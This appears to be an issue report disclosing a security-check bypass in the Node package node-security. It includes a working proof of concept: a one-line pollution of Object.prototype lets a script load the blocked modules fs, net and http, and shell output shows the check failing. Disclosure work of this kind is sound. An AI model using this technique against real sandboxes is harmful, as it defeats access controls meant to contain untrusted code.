Security check bypass through the pollution of the prototype of object #10
Description
I would like to second the concern of Qix in regards to the approach of sandboxing without creating a new JavaScript context. One of the issue that arises when sharing context is that the native object (ex.: Object, Number, String, etc.) will be shared and a lot of properties of those object are mutable. Those mutation can affect the execution of the script that checks things and the execution of whitelisted module.
Here's a very simple POC demonstrating the issue (I'm using the same script as Qix except for the bypass). The bypass works by polluting the prototype of Object so that an extra property now exists in the configuration saying that "demo.js" is allowed to used "fs", "net" and "http".
/* secure.js */
const nodesecurity = require( '@matthaywardwebdesign/node-security' );
const NodeSecurity = new nodesecurity();
// Don't allow anything at all.
NodeSecurity.configure({});
/* demo.js */
function try_require(name) {
try {
require(name);
console.log(name, '\x1b[1;32mOK\x1b[m');
} catch (e) {
console.error(name, '\x1b[1;31mFAIL\x1b[m -', e.message);
}
}
try_require('http');
try_require('fs');
try_require('net');
/* bypass.js */
Object.prototype[__filename.replace("bypass.js", "demo.js")] = { http: true, fs:true, net:true };
$ node demo.js
Executing ...
http OK
fs OK
net OK
$ node -r ./secure.js demo.js
Executing ...
http FAIL - NodeSecurity has blocked an attempt to access module 'http'. Parent modules = ['/.../demo.js']
fs FAIL - NodeSecurity has blocked an attempt to access module 'fs'. Parent modules = ['/.../demo.js']
net FAIL - NodeSecurity has blocked an attempt to access module 'net'. Parent modules = ['/.../demo.js']
$ node -r ./secure.js -r ./bypass.js ./demo.js
Executing ...
http OK
fs OK
net OK